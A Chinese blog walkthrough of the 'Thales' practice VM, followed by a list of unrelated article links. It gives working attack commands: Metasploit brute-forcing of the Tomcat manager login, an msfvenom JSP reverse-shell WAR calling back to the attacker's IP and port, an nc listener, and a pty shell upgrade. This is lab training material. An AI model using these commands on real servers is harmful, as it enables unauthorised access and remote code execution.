当前位置: 首页 > java >正文

Thales靶机

java 2025/8/2 12:08:02

导入vb,设置桥接

打开kali,扫描主机           172.16.2.7

17

扫描一下服务

看一下8080端口tomcat

尝试爆破

msfconsole

search login tomcat

use 0          这里的0是上面扫描login出来的序号,扫出来多少填多少

set rhost 172.16.2.7

run

得出账号密码tomcat   role1

在应用程序列表中我们可以进行文件上传和服务部署,因此构造一个反弹shell进行部署,生成反弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.2.63 LPORT=6688 -f war -o upfine.war

输入后将生成upfine.war文件

kali开启监听

nc -lvvp 6688

然后将upfine.war文件进行上传部署并点击upfine进行访问,成功获得shell权限

python3 -c 'import pty;pty.spawn("/bin/bash")'   升级下shell窗口。

http://www.xdnf.cn/news/16709.html

相关文章:

  • kali Linux 2025.2安装教程(解决安装失败-图文教程超详细)
  • jmeter--While控制器--循环直到接口响应符合条件
  • cmake项目基本demo
  • 深度学习(鱼书)day06--神经网络的学习(后两节)
  • C语言数据结构(1)顺序表专题2.顺序表的应用
  • 从零开始,在Windows环境部署vllm
  • 重庆邮电大学2026年计算机/软件/人工智能/网安考研备考指南
  • Matrix Theory study notes[6]
  • ansible巡检脚本
  • Zookeeper符合cap中的AP还是CP
  • 【AI News | 20250729】每日AI进展
  • uniapp中的$vm
  • 数字化转型-制造业未来蓝图:“超自动化”工厂
  • 开源项目:排序算法的多种实现方式
  • ComfyUI自定义图片导出路径
  • 【图像处理】直方图均衡化c++实现
  • OpenEuler 安装 apache + php8 不解析php文件的处理
  • 网络编程-(网络计算机和网络通信)
  • Web3:赛道划分与发展趋势解析
  • PYTHON从入门到实践-17通过网络API获取数据与可视化
  • STM32启动流程详解:从复位到main函数的完整路径
  • 鲸签云合同管理系统有什么功能?
  • 李宏毅2025《机器学习》-第九讲:大型语言模型评测的困境与“古德哈特定律”**
  • Newman+Jenkins实施接口自动化测试
  • 【学习过程记录】【czsc】1、安装
  • Tomcat 服务器日志
  • 解决Nginx的HTTPS跨域内容显示问题
  • REST、GraphQL、gRPC、tRPC深度对比
  • Buck的Loadline和DVS区别和联系
  • WebSocket 简介与在 Vue 中的使用指南